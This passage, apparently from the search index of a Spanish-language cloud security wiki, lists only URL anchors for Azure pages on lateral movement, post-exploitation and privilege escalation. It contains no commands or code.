hybrid-identity/seamless-sso.html#on-prem---cloud-a-través-de-delegación-constrained-basada-en-recursos","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-vulnerable-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#identifying-the-issues","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#exploit","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---credenciales-de-nube-local","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#almacenamiento-local-de-tokens-y-consideraciones-de-seguridad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-interfaz-de-línea-de-comandos","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#herramientas-automáticas-para-encontrarlos","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#recomendaciones-de-seguridad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#por-qué-cookies","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#ataque","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#az---pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#qué-es-un-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#verifica-si-tienes-un-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#cookie-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#flujo-de-la-cookie-prt-usando-tpm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#escenarios-de-abuso-de-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#ejemplos-de-ataque-pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#ataque---roadtoken","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#ataque---usando-roadrecon","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#ataque---usando-aadinternals-y-un-prt-filtrado","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#ataque---mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#referencias","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.html#az---phishing-primary-refresh-token-microsoft-entra","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#az---processes-memory-access-token","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#información-básica","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---token-de-actualización-primario-prt","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---post-explotación","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---funciones-apps-post-explotación","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#funciones-apps-post-explotación","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysrecoveraction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#explotación-posterior-de-la-base-de-datos-de-logic-apps","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsregenerateaccesskeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#referencias","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#acciones-authorizationrules-enviar-y-recibir-mensajes","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#referencias","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversconnectionpolicieswrite--microsoftsqlserversconnectionpoliciesread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverskeyswrite--microsoftsqlserverskeysread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesledgerdigestuploadsdisableaction-microsoftsqllocationsledgerdigestuploadsazureasyncoperationread-microsoftsqllocationsledgerdigestuploadsoperationresultsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasestransparentdataencryptionwrite-microsoftsqllocationstransparentdataencryptionazureasyncoperationread-microsoftsqlserversdatabasestransparentdataencryptionread","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#escritorio-virtual","pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.html#técnicas-comunes","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#información-sensible-en-imágenes","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#información-sensible-en-puntos-de-restauración","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#información-sensible-en-discos-y-instantáneas","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#información-sensible-en-extensiones-de-vm-y-aplicaciones-de-vm","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---escalación-de-privilegios","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#grupo-de-trabajadores-híbridos","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsjobswrite-microsoftautomationautomationaccountsrunbooksdraftwrite-microsoftautomationautomationaccountsjobsoutputread-microsoftautomationautomationaccountsrunbookspublishaction-microsoftresourcessubscriptionsresourcegroupsread-microsoftautomationautomationaccountsrunbookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsscheduleswrite-microsoftautomationautomationaccountsjobscheduleswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountswebhookswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsrunbooksdraftwrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountssourcecontrolswrite-microsoftautomationautomationaccountssourcecontrolsread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#microsoftautomationautomationaccountsvariableswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#entornos-de-ejecución-personalizados","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#comprometiendo-la-configuración-de-estado","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#az---azure-container-registry-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#azure-container-registry","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistcredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestokenswrite-microsoftcontainerregistryregistriesgeneratecredentialsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistrieslistbuildsourceuploadurlaction-microsoftcontainerregistryregistriesschedulerunaction-microsoftcontainerregistryregistriesrunslistlogsasurlaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriestaskswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.html#microsoftcontainerregistryregistriesimportimageaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#az---azure-container-instances-apps--jobs-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#azure-container-instances-apps--jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aci","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsread-microsoftcontainerinstancecontainergroupscontainersexecaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftresourcessubscriptionsresourcegroupsread-microsoftcontainerinstancecontainergroupswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#aca","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappsread-microsoftappmanagedenvironmentsread-microsoftappcontainerappsrevisionsreplicas-microsoftappcontainerappsrevisionsread-microsoftappcontainerappsgetauthtokenaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappcontainerappswrite-microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappmanagedenvironmentsjoinaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#jobs","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsread-microsoftappjobslistsecretsaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftmanagedidentityuserassignedidentitiesassignaction-microsoftappjobswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappmanagedenvironmentsread-microsoftappjobswrite-microsoftappmanagedenvironmentsjoinaction-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftappjobsstartaction-microsoftappjobsread","pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.html#microsoftcontainerinstancecontainergroupsrestartaction","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#az---cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#cosmosdb-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountssqlroledefinitionswrite-microsoftdocumentdbdatabaseaccountssqlroledefinitionsread--microsoftdocumentdbdatabaseaccountssqlroleassignmentswrite-microsoftdocumentdbdatabaseaccountssqlroleassignmentsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread-microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.html#microsoftdocumentdbdatabaseaccountslistkeysaction","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#az---entraid-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#roles","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#role-privileged-role-administrator","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/index.html#aplicaciones","pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-p